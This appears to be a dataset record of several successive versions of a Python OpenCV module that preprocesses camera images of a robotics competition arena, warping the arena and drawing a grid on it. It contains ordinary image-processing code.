the_outer_contour = contours[0]
the_inner_contour = contours[1]
peri_in = cv2.arcLength(the_inner_contour, True)
peri_out = cv2.arcLength(the_outer_contour, True)
in_corners = cv2.approxPolyDP(the_inner_contour, 0.01 * peri_in, True)
out_corners = cv2.approxPolyDP(the_outer_contour, 0.01 * peri_out, True)
if len(in_corners) != 4 and len(out_corners) != 4:
return
result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])
in_corners = in_corners[np.argsort(in_corners[:, 0, 0] + in_corners[:,
0, 1])]
out_corners = out_corners[np.argsort(out_corners[:, 0, 0] + out_corners
[:, 0, 1])]
corners = (in_corners + out_corners) / 2
source_pts = np.float32(corners)
M = cv2.getPerspectiveTransform(source_pts, result_pts)
return M
<|reserved_special_token_0|>
def arena_preprocess(frame, M):
processed_arena = cv2.warpPerspective(frame, M, (900, 600))
in_corners = np.array([[10, 18], [10, 590], [890, 590], [890, 15]])
h, w = processed_arena.shape[:2]
result_mask = np.zeros((h, w), np.uint8)
mask = np.zeros((h + 2, w + 2), np.uint8)
cv2.drawContours(mask, [in_corners], -1, 255, 1)
cv2.floodFill(result_mask, mask, (0, 0), 255)
processed_arena = cv2.add(processed_arena, cv2.cvtColor(result_mask,
cv2.COLOR_GRAY2BGR))
warped_arena = processed_arena.copy()
processed_arena = cv2.bilateralFilter(processed_arena, 5, 99, 198)
arena_inv = cv2.bitwise_not(processed_arena)
processed_arena = cv2.subtract(arena_inv, processed_arena)
processed_arena = cv2.bitwise_not(processed_arena)
for y in range(0, 6):
for x in range(0, 9):
cv2.line(processed_arena, (x * 100, y * 100), (x * 100, (y + 1) *
100), (0, 0, 0), 1)
cv2.line(processed_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)
return processed_arena, warped_arena
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def getTransformationMatrix(frame):
processed_arena = cv2.bilateralFilter(frame, 5, 99, 198)
processed_arena = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2GRAY)
processed_arena = cv2.equalizeHist(processed_arena)
processed_arena = cv2.adaptiveThreshold(processed_arena, 255, cv2.
ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 31, 5)
kernel = np.ones((7, 7), np.uint8)
processed_arena = cv2.erode(processed_arena, kernel)
kernel = np.ones((5, 5), np.uint8)
processed_arena = cv2.dilate(processed_arena, kernel)
contours, heirarchy = cv2.findContours(processed_arena, cv2.RETR_LIST,
cv2.CHAIN_APPROX_SIMPLE)
contours = sorted(contours, key=cv2.contourArea, reverse=True)
the_outer_contour = contours[0]
the_inner_contour = contours[1]
peri_in = cv2.arcLength(the_inner_contour, True)
peri_out = cv2.arcLength(the_outer_contour, True)
in_corners = cv2.approxPolyDP(the_inner_contour, 0.01 * peri_in, True)
out_corners = cv2.approxPolyDP(the_outer_contour, 0.01 * peri_out, True)
if len(in_corners) != 4 and len(out_corners) != 4:
return
result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])
in_corners = in_corners[np.argsort(in_corners[:, 0, 0] + in_corners[:,
0, 1])]
out_corners = out_corners[np.argsort(out_corners[:, 0, 0] + out_corners
[:, 0, 1])]
corners = (in_corners + out_corners) / 2
source_pts = np.float32(corners)
M = cv2.getPerspectiveTransform(source_pts, result_pts)
return M
<|reserved_special_token_0|>
def arena_preprocess(frame, M):
processed_arena = cv2.warpPerspective(frame, M, (900, 600))
in_corners = np.array([[10, 18], [10, 590], [890, 590], [890, 15]])
h, w = processed_arena.shape[:2]
result_mask = np.zeros((h, w), np.uint8)
mask = np.zeros((h + 2, w + 2), np.uint8)
cv2.drawContours(mask, [in_corners], -1, 255, 1)
cv2.floodFill(result_mask, mask, (0, 0), 255)
processed_arena = cv2.add(processed_arena, cv2.cvtColor(result_mask,
cv2.COLOR_GRAY2BGR))
warped_arena = processed_arena.copy()
processed_arena = cv2.bilateralFilter(processed_arena, 5, 99, 198)
arena_inv = cv2.bitwise_not(processed_arena)
processed_arena = cv2.subtract(arena_inv, processed_arena)
processed_arena = cv2.bitwise_not(processed_arena)
for y in range(0, 6):
for x in range(0, 9):
cv2.line(processed_arena, (x * 100, y * 100), (x * 100, (y + 1) *
100), (0, 0, 0), 1)
cv2.line(processed_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)
return processed_arena, warped_arena
<|reserved_special_token_0|>
def get_robot_space(frame):
frame = cv2.bilateralFilter(frame, 5, 99, 198)
source_pts = np.float32([[24, 56], [27, 444], [608, 47], [615, 437]])
result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])
M = cv2.getPerspectiveTransform(source_pts, result_pts)
warped_arena = cv2.warpPerspective(frame, M, (900, 600))
for y in range(0, 6):
for x in range(0, 9):
cv2.line(warped_arena, (x * 100, y * 100), (x * 100, (y + 1) *
100), (0, 0, 0), 1)
cv2.line(warped_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)
return warped_arena
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import cv2
import numpy as np
<|reserved_special_token_0|>
def getTransformationMatrix(frame):
processed_arena = cv2.bilateralFilter(frame, 5, 99, 198)
processed_arena = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2GRAY)
processed_arena = cv2.equalizeHist(processed_arena)
processed_arena = cv2.adaptiveThreshold(processed_arena, 255, cv2.
ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 31, 5)
kernel = np.ones((7, 7), np.uint8)
processed_arena = cv2.erode(processed_arena, kernel)
kernel = np.ones((5, 5), np.uint8)
processed_arena = cv2.dilate(processed_arena, kernel)
contours, heirarchy = cv2.findContours(processed_arena, cv2.RETR_LIST,
cv2.CHAIN_APPROX_SIMPLE)
contours = sorted(contours, key=cv2.contourArea, reverse=True)
the_outer_contour = contours[0]
the_inner_contour = contours[1]
peri_in = cv2.arcLength(the_inner_contour, True)
peri_out = cv2.arcLength(the_outer_contour, True)
in_corners = cv2.approxPolyDP(the_inner_contour, 0.01 * peri_in, True)
out_corners = cv2.approxPolyDP(the_outer_contour, 0.01 * peri_out, True)
if len(in_corners) != 4 and len(out_corners) != 4:
return
result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])
in_corners = in_corners[np.argsort(in_corners[:, 0, 0] + in_corners[:,
0, 1])]
out_corners = out_corners[np.argsort(out_corners[:, 0, 0] + out_corners
[:, 0, 1])]
corners = (in_corners + out_corners) / 2
source_pts = np.float32(corners)
M = cv2.getPerspectiveTransform(source_pts, result_pts)
return M
<|reserved_special_token_0|>
def arena_preprocess(frame, M):
processed_arena = cv2.warpPerspective(frame, M, (900, 600))
in_corners = np.array([[10, 18], [10, 590], [890, 590], [890, 15]])
h, w = processed_arena.shape[:2]
result_mask = np.zeros((h, w), np.uint8)
mask = np.zeros((h + 2, w + 2), np.uint8)
cv2.drawContours(mask, [in_corners], -1, 255, 1)
cv2.floodFill(result_mask, mask, (0, 0), 255)
processed_arena = cv2.add(processed_arena, cv2.cvtColor(result_mask,
cv2.COLOR_GRAY2BGR))
warped_arena = processed_arena.copy()
processed_arena = cv2.bilateralFilter(processed_arena, 5, 99, 198)
arena_inv = cv2.bitwise_not(processed_arena)
processed_arena = cv2.subtract(arena_inv, processed_arena)
processed_arena = cv2.bitwise_not(processed_arena)
for y in range(0, 6):
for x in range(0, 9):
cv2.line(processed_arena, (x * 100, y * 100), (x * 100, (y + 1) *
100), (0, 0, 0), 1)
cv2.line(processed_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)
return processed_arena, warped_arena
<|reserved_special_token_0|>
def get_robot_space(frame):
frame = cv2.bilateralFilter(frame, 5, 99, 198)
source_pts = np.float32([[24, 56], [27, 444], [608, 47], [615, 437]])
result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])
M = cv2.getPerspectiveTransform(source_pts, result_pts)
warped_arena = cv2.warpPerspective(frame, M, (900, 600))
for y in range(0, 6):
for x in range(0, 9):
cv2.line(warped_arena, (x * 100, y * 100), (x * 100, (y + 1) *
100), (0, 0, 0), 1)
cv2.line(warped_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)
return warped_arena
<|reserved_special_token_1|>
"""
* Team Id : LM#4787
* Author List : Arjun S, Vinod, Arvind, Vishnu
* Filename: ArenaPreprocessor.py
* Theme: Launch A Module
* Functions: arena_preprocess, getTransformationMatrix, get_robot_space
* Global Variables: None
"""
import cv2
import numpy as np
"""
* Function Name: getTransformationMatrix
* Input: frame - (raw camera feed of the arena)
* Output: perspective transformation matrix
* Logic: Uses image processing techniques and finds contours for outer border to
get transformation matrix
Each process is explained in the function
* Example Call: M = getTransformationMatrix(frame)
"""
def getTransformationMatrix(frame):
# # flips Horizontally and Vertically: Depends on Camera Setup
# arena = cv2.flip(frame, -1)
    # Denoising: bilateral filter, diameter 5 with sigma values 99/198
    # (preferred over medianBlur to maintain edge info)
processed_arena = cv2.bilateralFilter(frame, 5, 99, 198)
# To Grayscale
processed_arena = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2GRAY)
# Increase Contrast: for better border detection
processed_arena = cv2.equalizeHist(processed_arena)
    # Adaptive Threshold to get a thick black boundary (used over plain threshold for lighting considerations)
processed_arena = cv2.adaptiveThreshold(processed_arena, 255,
cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV,
31, 5)
# Morphological Operations: to remove noise
kernel = np.ones((7, 7), np.uint8)
processed_arena = cv2.erode(processed_arena, kernel)
kernel = np.ones((5, 5), np.uint8)
processed_arena = cv2.dilate(processed_arena, kernel)
# Contour Detection
    (contours, hierarchy) = cv2.findContours(processed_arena, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
    # Getting the contours of interest: inner and outer edges of the border box (largest and second largest contours)
contours = sorted(contours, key=cv2.contourArea, reverse=True)
the_outer_contour = contours[0]
the_inner_contour = contours[1]
# Approximating to get corners of the quadrilaterals
peri_in = cv2.arcLength(the_inner_contour, True)
peri_out = cv2.arcLength(the_outer_contour, True)
    in_corners = cv2.approxPolyDP(the_inner_contour, 0.01 * peri_in, True)
    out_corners = cv2.approxPolyDP(the_outer_contour, 0.01 * peri_out, True)
if len(in_corners) != 4 and len(out_corners) != 4:
return
# Define result dimensions (600 X 900) therefore each block 100 X 100
result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])
# Sort the detected corners to align with result corners
in_corners = in_corners[np.argsort(in_corners[:, 0, 0] + in_corners[:, 0, 1])]
out_corners = out_corners[np.argsort(out_corners[:, 0, 0] + out_corners[:, 0, 1])]
# corner blocks are less than 8 inches: block + center of border = 8in
corners = (in_corners + out_corners) / 2
source_pts = np.float32(corners)
# cv2.drawContours(frame, [corners], -1, (255, 0, 0), 2)
    # cv2.imshow('Display', frame)
# cv2.waitKey(0)
# For Debugging: cv2.drawContours(arena, corners, -1, (0, 0, 255), 5)
# Get transformation matrix
M = cv2.getPerspectiveTransform(source_pts, result_pts)
return M
"""
* Function Name: arena_preprocess
* Input: image - (raw camera feed of the arena)
* Output: processed_arena, warped_arena
* Logic: Multiple openCV tricks are used to make the raw camera feed
as close to ideal image as possible
Each process is explained in the function
* Example Call: arena_preprocess(frame, M)
"""
def arena_preprocess(frame, M):
# Remapping to final desired result image
processed_arena = cv2.warpPerspective(frame, M, (900, 600))
# Make the excess black border White: ~10px thick
in_corners = np.array([[10, 18], [10, 590], [890, 590], [890, 15]])
h, w = processed_arena.shape[:2]
result_mask = np.zeros((h, w), np.uint8)
mask = np.zeros((h + 2, w + 2), np.uint8)
cv2.drawContours(mask, [in_corners], -1, 255, 1)
cv2.floodFill(result_mask, mask, (0, 0), 255)
processed_arena = cv2.add(processed_arena, cv2.cvtColor(result_mask, cv2.COLOR_GRAY2BGR))
# cv2.imshow('Display', processed_arena)
# cv2.waitKey(0)
    warped_arena = processed_arena.copy()
# Warped_arena: to be used for robot tracking
# Denoising: bilateral filter
processed_arena = cv2.bilateralFilter(processed_arena, 5, 99, 198)
# To Make Background White:
# 1) Invert
arena_inv = cv2.bitwise_not(processed_arena)
# 2) Subtract
processed_arena = cv2.subtract(arena_inv, processed_arena)
# 3) Invert
processed_arena = cv2.bitwise_not(processed_arena)
# # Color Enhancement: Does Not Help in color detection
# ycrcb = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2YCR_CB)
# y, cr, cb = cv2.split(ycrcb)
# cv2.equalizeHist(y, y)
# ycrcb = cv2.merge((y, cr, cb))
# processed_arena = cv2.cvtColor(ycrcb, cv2.COLOR_YCR_CB2BGR)
#
# # Shadow Removal- Not Used since Removes Shape Detail
# shadow = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2GRAY)
# ret, shadow = cv2.threshold(shadow, 10, 255, cv2.THRESH_BINARY_INV)
# shadow = cv2.cvtColor(shadow, cv2.COLOR_GRAY2BGR)
# processed_arena = cv2.add(processed_arena, shadow)
# cv2.imshow('Display', processed_arena)
# cv2.waitKey(0)
# Show Grid Lines
for y in range(0, 6):
for x in range(0, 9):
cv2.line(processed_arena, (x * 100, y * 100), (x * 100, (y + 1) * 100), (0, 0, 0), 1)
cv2.line(processed_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)
# cv2.imshow('Display', processed_arena)
# cv2.waitKey(0)
# cv2.destroyAllWindows()
# processed_arena: to be used for Object Detection
return processed_arena, warped_arena
"""
* Function Name: get_robot_space
* Input: frame - (raw camera feed of the arena)
* Output: warped portion of arena
* Logic: Warps a portion of the arena to which the robot position
is mapped to avoid parallax
* Example Call: robot_space = get_robot_space(frame)
"""
def get_robot_space(frame):
    # Denoising: bilateral filter, diameter 5 with sigma values 99/198
    # (preferred over medianBlur to maintain edge info)
frame = cv2.bilateralFilter(frame, 5, 99, 198)
    # Source points: corners of the robot-tracking region, picked manually
    # from the camera view of the arena
    source_pts = np.float32([[24, 56], [27, 444], [608, 47], [615, 437]])
# Define result dimensions (600 X 900) therefore each block 100 X 100
result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])
# Get transformation matrix
M = cv2.getPerspectiveTransform(source_pts, result_pts)
# Remapping to final desired result image
warped_arena = cv2.warpPerspective(frame, M, (900, 600))
# Show Grid Lines
for y in range(0, 6):
for x in range(0, 9):
cv2.line(warped_arena, (x * 100, y * 100), (x * 100, (y + 1) * 100), (0, 0, 0), 1)
cv2.line(warped_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)
return warped_arena
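
# A minimal end-to-end sketch of how these helpers compose. Assumptions (not
# from the source): camera index 0 and the window name are placeholders;
# adapt them to the actual rig.
if __name__ == '__main__':
    cap = cv2.VideoCapture(0)
    ret, frame = cap.read()
    cap.release()
    if ret:
        M = getTransformationMatrix(frame)
        if M is not None:  # corner detection can fail on a bad frame
            processed, warped = arena_preprocess(frame, M)
            cv2.imshow('Processed Arena', processed)
            cv2.waitKey(0)
            cv2.destroyAllWindows()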
|
flexible
|
{
"blob_id": "228852f960e9343d9f45abdd3204cfab7bb54bc6",
"index": 8230,
"step-1": "<mask token>\n\n\ndef arena_preprocess(frame, M):\n processed_arena = cv2.warpPerspective(frame, M, (900, 600))\n in_corners = np.array([[10, 18], [10, 590], [890, 590], [890, 15]])\n h, w = processed_arena.shape[:2]\n result_mask = np.zeros((h, w), np.uint8)\n mask = np.zeros((h + 2, w + 2), np.uint8)\n cv2.drawContours(mask, [in_corners], -1, 255, 1)\n cv2.floodFill(result_mask, mask, (0, 0), 255)\n processed_arena = cv2.add(processed_arena, cv2.cvtColor(result_mask,\n cv2.COLOR_GRAY2BGR))\n warped_arena = processed_arena.copy()\n processed_arena = cv2.bilateralFilter(processed_arena, 5, 99, 198)\n arena_inv = cv2.bitwise_not(processed_arena)\n processed_arena = cv2.subtract(arena_inv, processed_arena)\n processed_arena = cv2.bitwise_not(processed_arena)\n for y in range(0, 6):\n for x in range(0, 9):\n cv2.line(processed_arena, (x * 100, y * 100), (x * 100, (y + 1) *\n 100), (0, 0, 0), 1)\n cv2.line(processed_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)\n return processed_arena, warped_arena\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef getTransformationMatrix(frame):\n processed_arena = cv2.bilateralFilter(frame, 5, 99, 198)\n processed_arena = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2GRAY)\n processed_arena = cv2.equalizeHist(processed_arena)\n processed_arena = cv2.adaptiveThreshold(processed_arena, 255, cv2.\n ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 31, 5)\n kernel = np.ones((7, 7), np.uint8)\n processed_arena = cv2.erode(processed_arena, kernel)\n kernel = np.ones((5, 5), np.uint8)\n processed_arena = cv2.dilate(processed_arena, kernel)\n contours, heirarchy = cv2.findContours(processed_arena, cv2.RETR_LIST,\n cv2.CHAIN_APPROX_SIMPLE)\n contours = sorted(contours, key=cv2.contourArea, reverse=True)\n the_outer_contour = contours[0]\n the_inner_contour = contours[1]\n peri_in = cv2.arcLength(the_inner_contour, True)\n peri_out = cv2.arcLength(the_outer_contour, True)\n in_corners = cv2.approxPolyDP(the_inner_contour, 0.01 * peri_in, True)\n out_corners = cv2.approxPolyDP(the_outer_contour, 0.01 * peri_out, True)\n if len(in_corners) != 4 and len(out_corners) != 4:\n return\n result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])\n in_corners = in_corners[np.argsort(in_corners[:, 0, 0] + in_corners[:, \n 0, 1])]\n out_corners = out_corners[np.argsort(out_corners[:, 0, 0] + out_corners\n [:, 0, 1])]\n corners = (in_corners + out_corners) / 2\n source_pts = np.float32(corners)\n M = cv2.getPerspectiveTransform(source_pts, result_pts)\n return M\n\n\n<mask token>\n\n\ndef arena_preprocess(frame, M):\n processed_arena = cv2.warpPerspective(frame, M, (900, 600))\n in_corners = np.array([[10, 18], [10, 590], [890, 590], [890, 15]])\n h, w = processed_arena.shape[:2]\n result_mask = np.zeros((h, w), np.uint8)\n mask = np.zeros((h + 2, w + 2), np.uint8)\n cv2.drawContours(mask, [in_corners], -1, 255, 1)\n cv2.floodFill(result_mask, mask, (0, 0), 255)\n processed_arena = cv2.add(processed_arena, cv2.cvtColor(result_mask,\n cv2.COLOR_GRAY2BGR))\n warped_arena = processed_arena.copy()\n processed_arena = cv2.bilateralFilter(processed_arena, 5, 99, 198)\n arena_inv = cv2.bitwise_not(processed_arena)\n processed_arena = cv2.subtract(arena_inv, processed_arena)\n processed_arena = cv2.bitwise_not(processed_arena)\n for y in range(0, 6):\n for x in range(0, 9):\n cv2.line(processed_arena, (x * 100, y * 100), (x * 100, (y + 1) *\n 100), (0, 0, 0), 1)\n cv2.line(processed_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)\n return processed_arena, warped_arena\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef getTransformationMatrix(frame):\n processed_arena = cv2.bilateralFilter(frame, 5, 99, 198)\n processed_arena = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2GRAY)\n processed_arena = cv2.equalizeHist(processed_arena)\n processed_arena = cv2.adaptiveThreshold(processed_arena, 255, cv2.\n ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 31, 5)\n kernel = np.ones((7, 7), np.uint8)\n processed_arena = cv2.erode(processed_arena, kernel)\n kernel = np.ones((5, 5), np.uint8)\n processed_arena = cv2.dilate(processed_arena, kernel)\n contours, heirarchy = cv2.findContours(processed_arena, cv2.RETR_LIST,\n cv2.CHAIN_APPROX_SIMPLE)\n contours = sorted(contours, key=cv2.contourArea, reverse=True)\n the_outer_contour = contours[0]\n the_inner_contour = contours[1]\n peri_in = cv2.arcLength(the_inner_contour, True)\n peri_out = cv2.arcLength(the_outer_contour, True)\n in_corners = cv2.approxPolyDP(the_inner_contour, 0.01 * peri_in, True)\n out_corners = cv2.approxPolyDP(the_outer_contour, 0.01 * peri_out, True)\n if len(in_corners) != 4 and len(out_corners) != 4:\n return\n result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])\n in_corners = in_corners[np.argsort(in_corners[:, 0, 0] + in_corners[:, \n 0, 1])]\n out_corners = out_corners[np.argsort(out_corners[:, 0, 0] + out_corners\n [:, 0, 1])]\n corners = (in_corners + out_corners) / 2\n source_pts = np.float32(corners)\n M = cv2.getPerspectiveTransform(source_pts, result_pts)\n return M\n\n\n<mask token>\n\n\ndef arena_preprocess(frame, M):\n processed_arena = cv2.warpPerspective(frame, M, (900, 600))\n in_corners = np.array([[10, 18], [10, 590], [890, 590], [890, 15]])\n h, w = processed_arena.shape[:2]\n result_mask = np.zeros((h, w), np.uint8)\n mask = np.zeros((h + 2, w + 2), np.uint8)\n cv2.drawContours(mask, [in_corners], -1, 255, 1)\n cv2.floodFill(result_mask, mask, (0, 0), 255)\n processed_arena = cv2.add(processed_arena, cv2.cvtColor(result_mask,\n cv2.COLOR_GRAY2BGR))\n warped_arena = processed_arena.copy()\n processed_arena = cv2.bilateralFilter(processed_arena, 5, 99, 198)\n arena_inv = cv2.bitwise_not(processed_arena)\n processed_arena = cv2.subtract(arena_inv, processed_arena)\n processed_arena = cv2.bitwise_not(processed_arena)\n for y in range(0, 6):\n for x in range(0, 9):\n cv2.line(processed_arena, (x * 100, y * 100), (x * 100, (y + 1) *\n 100), (0, 0, 0), 1)\n cv2.line(processed_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)\n return processed_arena, warped_arena\n\n\n<mask token>\n\n\ndef get_robot_space(frame):\n frame = cv2.bilateralFilter(frame, 5, 99, 198)\n source_pts = np.float32([[24, 56], [27, 444], [608, 47], [615, 437]])\n result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])\n M = cv2.getPerspectiveTransform(source_pts, result_pts)\n warped_arena = cv2.warpPerspective(frame, M, (900, 600))\n for y in range(0, 6):\n for x in range(0, 9):\n cv2.line(warped_arena, (x * 100, y * 100), (x * 100, (y + 1) * \n 100), (0, 0, 0), 1)\n cv2.line(warped_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)\n return warped_arena\n",
"step-4": "<mask token>\nimport cv2\nimport numpy as np\n<mask token>\n\n\ndef getTransformationMatrix(frame):\n processed_arena = cv2.bilateralFilter(frame, 5, 99, 198)\n processed_arena = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2GRAY)\n processed_arena = cv2.equalizeHist(processed_arena)\n processed_arena = cv2.adaptiveThreshold(processed_arena, 255, cv2.\n ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 31, 5)\n kernel = np.ones((7, 7), np.uint8)\n processed_arena = cv2.erode(processed_arena, kernel)\n kernel = np.ones((5, 5), np.uint8)\n processed_arena = cv2.dilate(processed_arena, kernel)\n contours, heirarchy = cv2.findContours(processed_arena, cv2.RETR_LIST,\n cv2.CHAIN_APPROX_SIMPLE)\n contours = sorted(contours, key=cv2.contourArea, reverse=True)\n the_outer_contour = contours[0]\n the_inner_contour = contours[1]\n peri_in = cv2.arcLength(the_inner_contour, True)\n peri_out = cv2.arcLength(the_outer_contour, True)\n in_corners = cv2.approxPolyDP(the_inner_contour, 0.01 * peri_in, True)\n out_corners = cv2.approxPolyDP(the_outer_contour, 0.01 * peri_out, True)\n if len(in_corners) != 4 and len(out_corners) != 4:\n return\n result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])\n in_corners = in_corners[np.argsort(in_corners[:, 0, 0] + in_corners[:, \n 0, 1])]\n out_corners = out_corners[np.argsort(out_corners[:, 0, 0] + out_corners\n [:, 0, 1])]\n corners = (in_corners + out_corners) / 2\n source_pts = np.float32(corners)\n M = cv2.getPerspectiveTransform(source_pts, result_pts)\n return M\n\n\n<mask token>\n\n\ndef arena_preprocess(frame, M):\n processed_arena = cv2.warpPerspective(frame, M, (900, 600))\n in_corners = np.array([[10, 18], [10, 590], [890, 590], [890, 15]])\n h, w = processed_arena.shape[:2]\n result_mask = np.zeros((h, w), np.uint8)\n mask = np.zeros((h + 2, w + 2), np.uint8)\n cv2.drawContours(mask, [in_corners], -1, 255, 1)\n cv2.floodFill(result_mask, mask, (0, 0), 255)\n processed_arena = cv2.add(processed_arena, cv2.cvtColor(result_mask,\n cv2.COLOR_GRAY2BGR))\n warped_arena = processed_arena.copy()\n processed_arena = cv2.bilateralFilter(processed_arena, 5, 99, 198)\n arena_inv = cv2.bitwise_not(processed_arena)\n processed_arena = cv2.subtract(arena_inv, processed_arena)\n processed_arena = cv2.bitwise_not(processed_arena)\n for y in range(0, 6):\n for x in range(0, 9):\n cv2.line(processed_arena, (x * 100, y * 100), (x * 100, (y + 1) *\n 100), (0, 0, 0), 1)\n cv2.line(processed_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)\n return processed_arena, warped_arena\n\n\n<mask token>\n\n\ndef get_robot_space(frame):\n frame = cv2.bilateralFilter(frame, 5, 99, 198)\n source_pts = np.float32([[24, 56], [27, 444], [608, 47], [615, 437]])\n result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])\n M = cv2.getPerspectiveTransform(source_pts, result_pts)\n warped_arena = cv2.warpPerspective(frame, M, (900, 600))\n for y in range(0, 6):\n for x in range(0, 9):\n cv2.line(warped_arena, (x * 100, y * 100), (x * 100, (y + 1) * \n 100), (0, 0, 0), 1)\n cv2.line(warped_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)\n return warped_arena\n",
"step-5": "\"\"\"\n* Team Id : LM#4787\n* Author List : Arjun S, Vinod, Arvind, Vishnu\n* Filename: ArenaPreprocessor.py\n* Theme: Launch A Module\n* Functions: arena_preprocess, getTransformationMatrix, get_robot_space\n* Global Variables: None\n\"\"\"\n\nimport cv2\nimport numpy as np\n\n\n\"\"\"\n* Function Name: getTransformationMatrix\n* Input: frame - (raw camera feed of the arena)\n* Output: perspective transformation matrix\n* Logic: Uses image processing techniques and finds contours for outer border to\n get transformation matrix\n Each process is explained in the function\n* Example Call: M = getTransformationMatrix(frame)\n\"\"\"\n\ndef getTransformationMatrix(frame):\n # # flips Horizontally and Vertically: Depends on Camera Setup\n # arena = cv2.flip(frame, -1)\n\n # Denoising: bilateral filter Kernel size of 99 (Preferred Over medianBlur to maintain edge info)\n processed_arena = cv2.bilateralFilter(frame, 5, 99, 198)\n\n # To Grayscale\n processed_arena = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2GRAY)\n\n # Increase Contrast: for better border detection\n processed_arena = cv2.equalizeHist(processed_arena)\n\n # Adaptive Threshold to get black thick boundary: (Used over Threshold: for lighting consideration1)\n processed_arena = cv2.adaptiveThreshold(processed_arena, 255,\n cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV,\n 31, 5)\n\n # Morphological Operations: to remove noise\n kernel = np.ones((7, 7), np.uint8)\n processed_arena = cv2.erode(processed_arena, kernel)\n\n kernel = np.ones((5, 5), np.uint8)\n processed_arena = cv2.dilate(processed_arena, kernel)\n\n # Contour Detection\n (contours, heirarchy) = cv2.findContours(processed_arena, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n\n # Getting the contour of interest: inner edge and outer edge of the box- largest and second largest contour\n contours = sorted(contours, key=cv2.contourArea, reverse=True)\n the_outer_contour = contours[0]\n the_inner_contour = contours[1]\n\n # Approximating to get corners of the quadrilaterals\n peri_in = cv2.arcLength(the_inner_contour, True)\n peri_out = cv2.arcLength(the_outer_contour, True)\n in_corners = cv2.approxPolyDP(the_inner_contour, .01 * peri_in, True)\n out_corners = cv2.approxPolyDP(the_outer_contour, .01 * peri_out, True)\n if len(in_corners) != 4 and len(out_corners) != 4:\n return\n\n # Define result dimensions (600 X 900) therefore each block 100 X 100\n result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])\n\n # Sort the detected corners to align with result corners\n in_corners = in_corners[np.argsort(in_corners[:, 0, 0] + in_corners[:, 0, 1])]\n out_corners = out_corners[np.argsort(out_corners[:, 0, 0] + out_corners[:, 0, 1])]\n\n # corner blocks are less than 8 inches: block + center of border = 8in\n corners = (in_corners + out_corners) / 2\n source_pts = np.float32(corners)\n\n # cv2.drawContours(frame, [corners], -1, (255, 0, 0), 2)\n # cv2.imshow('Display'. 
frame)\n # cv2.waitKey(0)\n # For Debugging: cv2.drawContours(arena, corners, -1, (0, 0, 255), 5)\n\n # Get transformation matrix\n M = cv2.getPerspectiveTransform(source_pts, result_pts)\n\n return M\n\n\n\"\"\"\n* Function Name: arena_preprocess\n* Input: image - (raw camera feed of the arena)\n* Output: processed_arena, warped_arena\n* Logic: Multiple openCV tricks are used to make the raw camera feed\n as close to ideal image as possible\n Each process is explained in the function\n* Example Call: arena_preprocess(frame, M)\n\"\"\"\n\ndef arena_preprocess(frame, M):\n # Remapping to final desired result image\n processed_arena = cv2.warpPerspective(frame, M, (900, 600))\n\n # Make the excess black border White: ~10px thick\n in_corners = np.array([[10, 18], [10, 590], [890, 590], [890, 15]])\n h, w = processed_arena.shape[:2]\n result_mask = np.zeros((h, w), np.uint8)\n mask = np.zeros((h + 2, w + 2), np.uint8)\n cv2.drawContours(mask, [in_corners], -1, 255, 1)\n cv2.floodFill(result_mask, mask, (0, 0), 255)\n processed_arena = cv2.add(processed_arena, cv2.cvtColor(result_mask, cv2.COLOR_GRAY2BGR))\n\n # cv2.imshow('Display', processed_arena)\n # cv2.waitKey(0)\n warped_arena = processed_arena.copy();\n # Warped_arena: to be used for robot tracking\n # Denoising: bilateral filter\n processed_arena = cv2.bilateralFilter(processed_arena, 5, 99, 198)\n\n # To Make Background White:\n # 1) Invert\n arena_inv = cv2.bitwise_not(processed_arena)\n # 2) Subtract\n processed_arena = cv2.subtract(arena_inv, processed_arena)\n # 3) Invert\n 